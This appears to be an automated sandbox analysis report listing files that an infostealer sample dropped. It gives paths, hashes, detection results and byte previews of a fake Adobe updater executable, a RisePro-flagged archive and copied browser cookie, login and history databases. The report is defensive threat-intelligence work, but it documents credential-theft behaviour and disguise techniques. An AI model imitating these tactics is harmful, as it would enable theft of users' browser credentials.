Preview:	MDMP..a..... .........Of............t............#..........l....,......d..."a..........`.......8...........T............g..F............,..........................................................................................eJ......./......GenuineIntel............T.......$.....Of.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER20AB.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8386
Entropy (8bit):	3.698669040513178
Encrypted:	false
SSDEEP:	192:R6l7wVeJ+W6J22U6Y2DsSU9FrgmfBJlupr+89b8gsfqv0m:R6lXJH6J22U6YRSU9FrgmfBJlM8zfw
MD5:	93445F71EF63A9D87F59F8A533E583E6
SHA1:	0405475209E094E77F3E1FDE7BB3462891ADC0D1
SHA-256:	22C66500F1070CBB86FBE9F32F1E70E380E1E8A9F4968C10ED6B7E825FDF4569
SHA-512:	2367865369600FA90CF13EB423DEA0537D86C1184D399C0490E5C453B45AA9859E6FA0CB06564E482FAFCF6F6FD9615E800D56790CBC14A000764173C6DBB6FE
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER20DB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4640
Entropy (8bit):	4.510777873461234
Encrypted:	false
SSDEEP:	48:cvIwWl8zsJJg77aI9H8WpW8VYTYm8M4J4dFPg+q8jbR2vX3P8d:uIjfbI7917VHJUgMyf8d
MD5:	FB6C1BF881453BB5B01432E33E6AA279
SHA1:	115608ECD3EF5249F8E7D706B4AD1A28987BD94E
SHA-256:	9E8211F27712E3569CDB6DE22D0C6819E68E0EA707E3D7B957A63DE7F8A0DB89
SHA-512:	91499E35AE585560A73B01EEF3106E3BFD703C6BE3073E47797B3A1B1769036389FBCE27BE12A0AC5D603CDA51AEEF1685B9369B6D844DABA4B6F8B5CD7FE818
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336324" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	468480
Entropy (8bit):	7.707638639777151
Encrypted:	false
SSDEEP:	12288:8fUVPK8c9FHGovaqSdUgGe2floqIIxuSyovf4CzBIG6Dac:RK/9F1vaqbeeloqII4SHv3OG6j
MD5:	F14B083F53FEFD0071732BF5C0DCD6FA
SHA1:	661566E9131C39A1B34CABDE9A14877D9BCB3D90
SHA-256:	2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
SHA-512:	889804F0872D7882EB9160EA4B0EF7E86079006965B988BB5426F36CB2B9B354F03C411759FF74D91905EAA67B88EA5F11BE76B5F0F4F47B8AA9B53FCB9FBCDF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Joe Sandbox View:	Filename: PstCgdvsgB.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I../...\|...\|...\|..}...\|..}...\|..}...\|..}...\|...\|V..\|.l.}...\|.l.}...\|.l.}@..\|.o.}...\|.o.}...\|Rich...\|........PE..L....yOf...............'.............F............@..........................p............@.................................DY..(............................P.......?...............................>..@...............@............................text...$........................... ..`.bss................................ ..`.rdata..x...........................@..@.data...d....p.......>..............@....reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	468480
Entropy (8bit):	7.707638639777151
Encrypted:	false
SSDEEP:	12288:8fUVPK8c9FHGovaqSdUgGe2floqIIxuSyovf4CzBIG6Dac:RK/9F1vaqbeeloqII4SHv3OG6j
MD5:	F14B083F53FEFD0071732BF5C0DCD6FA
SHA1:	661566E9131C39A1B34CABDE9A14877D9BCB3D90
SHA-256:	2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
SHA-512:	889804F0872D7882EB9160EA4B0EF7E86079006965B988BB5426F36CB2B9B354F03C411759FF74D91905EAA67B88EA5F11BE76B5F0F4F47B8AA9B53FCB9FBCDF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Joe Sandbox View:	Filename: PstCgdvsgB.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I../...\|...\|...\|..}...\|..}...\|..}...\|..}...\|...\|V..\|.l.}...\|.l.}...\|.l.}@..\|.o.}...\|.o.}...\|Rich...\|........PE..L....yOf...............'.............F............@..........................p............@.................................DY..(............................P.......?...............................>..@...............@............................text...$........................... ..`.bss................................ ..`.rdata..x...........................@..@.data...d....p.......>..............@....reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\KBHGMwjOItm_DLNJJFRnML7.zip

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	671895
Entropy (8bit):	7.997922193587408
Encrypted:	true
SSDEEP:	12288:Wcv0SH6dc9+9fcOfF64IYmCgVOUj04CLo5/OV6K5z0Y+QB0ajza2LAe4CWpzblvv:jv16lfJfo4I9CgUUcwmV6iz2anJUzCWn
MD5:	25FA1BBF328B47BF8BA0DF56F4BEE5B0
SHA1:	0A5098B86B868415C0E199CAB2A0CE54A6200E7D
SHA-256:	860FA6FDFD5EB0BD0E7605206A88F47BDBABA8E9AF8C734967C418450A569D21
SHA-512:	DB73D5B8CBD82CBABAB3947C36D3AC6D9343D3039FB5BA8EE06FA5AB25C9FCDA36B950CC9C964E73DAFA390960525BF993CC4CDF54CCE5FB1DDD3F59D45D940D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\KBHGMwjOItm_DLNJJFRnML7.zip, Author: Joe Security
Preview:	PK...........X................Cookies\..PK...........XA.`%............Cookies\Chrome_Default.txt....@.........i.&h.Cn..L...\.FA@.~..v7..O...%!es.f..../S..a...@.,ek.%.H......</<2..,...I..w......1q.f.F+PiM.=h.5..2....0....O..u_.~}Z.UM........y...Rj..4H..D...xLY@....[.d.c&......G_............j%q%....Y.\|.....P...u..u..85/..Z`...-..c...^A8n...Y.3......j.G!....c.....AM@!._W.yQbs.@.....h.y.-......\|J..i...r....c....M...E...GS...C....X..C.U..v.%......C,.L0,......5.=....6.....PK...........X'...g...........information.txt.X.O.H.~...a.{....o.y:...6.#...=8.&.p..vB..........#.....\|3...f.Wq.......d..1y.gi.p.v;..IP.>....0x"\...9.+.p.eg...85.'}..&......AO...&a4.)A..x.$....<.t....]!iO.0.1fL.....6z.....u;g.....Li.2.<.'....}.()...a..2(.}2......3.e...S<....^.O7.8fc...,. 'q..h.....oY.$..f...x.t.y.}Y..G....y~.'.#..p....jGY.o<..\|7..G.g..O....Krp.*.i.$.a...F.F.c.'...Qr.g.n..?.. [,W....`.e..............Ra........2.z]."KV.".=.aP...oA:[..zkop..\|5O.,...@v......q..&"_.t.e.C..KM".r.W.

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\02zdBXl47cvzcookies.sqlite

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\3P7JnOlL1OlXHistory

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\3b6N2Xdh3CYwplaces.sqlite

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\B0316QB33WdRCookies

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\D7xhTl4YAcm4Login Data

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\D87fZN3R3jFeplaces.sqlite

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\K2bxMwkdLZUwCookies

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\NiTuuJ95v89DHistory

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\Oh9vbPMur9FiLogin Data

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\RzvNVqGUEpJhWeb Data

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\S4ECHZA8NR3oWeb Data

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\ZvP9NIG0u2hrWeb Data

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\_mL6_rRT6Cx2History

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\dP6LfDcELUJXWeb Data

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\jsSil7KsrPQ9History

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\rg706_nABxIULogin Data For Account

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\uFScRKoRnRdZWeb Data

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
